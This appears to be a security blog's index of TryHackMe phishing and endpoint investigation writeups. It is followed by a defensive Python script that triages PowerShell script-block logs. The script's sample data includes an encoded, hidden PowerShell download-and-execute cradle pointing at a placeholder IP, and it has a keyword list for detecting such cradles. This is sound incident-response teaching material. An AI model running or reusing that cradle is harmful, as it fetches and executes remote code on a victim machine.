Welcome🖐


Here I share my thoughts on InfoSec news, plus technical guides and writeups.
  • Boogeyman 2

    Phishing Email and attachment Investigation

    By Ren Sie
Refer to Boogeyman2 for the challenge room on TryHackMe. Artefacts: for the investigation, we will receive the following items: a copy of the phishing email, and a memory dump of the victim's workstation. Tools: volatility_3, an open-source framework for extracting data from RAM samples. Note: It may take a few... [Read More]
  • Boogeyman 1

Phishing Email, attachment, compromised endpoint machine Investigation

    By Ren Sie
Refer to Boogeyman1 for the challenge room on TryHackMe. Artefacts: for the investigation, we will be provided with the following artefacts: a copy of the phishing email (`dump.eml`), PowerShell logs from Julianne's workstation (`powershell.json`), and a packet capture from the same workstation (`capture.pcapng`). Note: The powershell.json file contains JSON-formatted PowerShell logs extracted from... [Read More]
  • Tempest

    Sysmon Log, Windows Eventlog, network packet investigation

    By Ren Sie
Refer to Tempest for the challenge room on TryHackMe. Preparation - Tools and Artifacts. Toolset: Sysmon logs, Windows Event logs, packet capture, endpoint logs. To analyze Windows artefacts like Windows Event Logs and Sysmon logs, we will use the following tools: EvtxECmd, Timeline Explorer, SysmonView, Event Viewer. Endpoint Logs: To... [Read More]
  • Phishing - Snapped Phish-ing Line

    Phishing Email, malicious attachment inspection

    By Ren Sie
Refer to Snapped Phish-ing Line for the challenge room on TryHackMe. Scenario: As IT department personnel at SwiftSpend Financial, one of your responsibilities is to assist employees with their technical concerns. While everything seemed routine, the situation changed when several employees from various departments began reporting an unusual email... [Read More]
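The Boogeyman 1 entry above lists JSON-formatted PowerShell logs (`powershell.json`) among the artefacts. The block below is an added example, not code from the writeup or from TryHackMe, showing one way a practitioner triages such logs: parse newline-delimited JSON records, keep script-block events, decode any `-EncodedCommand` payload (base64 of UTF-16LE text), and flag download-and-execute indicators. The field names `EventID`, `TimeCreated` and `ScriptBlockText` are an assumption modelled on Windows PowerShell script block logging (event 4104); the real file from the room may use a different schema. The three log records are constructed inline.

```python
import base64
import json
import re

# --- constructed sample input (not from the room's powershell.json) ---------

def encode_ps(cmd: str) -> str:
    """Encode a command the way `powershell -EncodedCommand` expects it:
    UTF-16LE text, then base64. Used only to build the sample record."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")

# Hypothetical payload, a typical download-and-execute cradle.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/a.ps1')"

# Assumed schema: one JSON object per line with EventID / TimeCreated /
# ScriptBlockText. Timestamps and contents are made up for illustration.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"EventID": 4103, "TimeCreated": "2023-01-01T10:00:00Z",
     "Payload": "CommandInvocation(Get-Process)"},
    {"EventID": 4104, "TimeCreated": "2023-01-01T10:00:05Z",
     "ScriptBlockText": "powershell -nop -w hidden -enc " + encode_ps(ENCODED_PAYLOAD)},
    {"EventID": 4104, "TimeCreated": "2023-01-01T10:00:09Z",
     "ScriptBlockText": "Get-ChildItem C:\\Users"},
])

# --- triage logic -----------------------------------------------------------

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the
# common abbreviations. The base64 group is deliberately loose (>= 16 chars).
ENC_RE = re.compile(r"(?i)(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Substrings that, in a script block, usually deserve an analyst's attention.
SUSPICIOUS = ("downloadstring", "iex", "invoke-expression", "-nop",
              "-w hidden", "frombase64string", "net.webclient")


def decode_encoded_commands(text: str) -> list[str]:
    """Return the decoded text of every -EncodedCommand argument found in text.
    Invalid base64 or odd-length byte strings are skipped rather than raised."""
    decoded = []
    for m in ENC_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def script_blocks(log_text: str):
    """Yield (timestamp, ScriptBlockText) for every 4104 record in a
    newline-delimited JSON log; malformed lines are skipped."""
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("EventID") == 4104 and rec.get("ScriptBlockText"):
            yield rec.get("TimeCreated"), rec["ScriptBlockText"]


def triage(log_text: str) -> list[dict]:
    """Return one finding per script block that contains a suspicious
    indicator, searching both the raw text and any decoded payloads."""
    findings = []
    for ts, text in script_blocks(log_text):
        decoded = decode_encoded_commands(text)
        haystack = (text + " " + " ".join(decoded)).lower()
        hits = [k for k in SUSPICIOUS if k in haystack]
        if hits:
            findings.append({"time": ts, "indicators": hits,
                             "decoded": decoded, "raw": text})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["time"], f["indicators"])
        for d in f["decoded"]:
            print("  decoded:", d)
```

Run against a real export, replace `SAMPLE_LOG` with the file contents and adjust the field names to whatever the exporter produced; the decoding step is the part that matters, since the encoded cradle hides every keyword the indicator list looks for until it is turned back into UTF-16LE text.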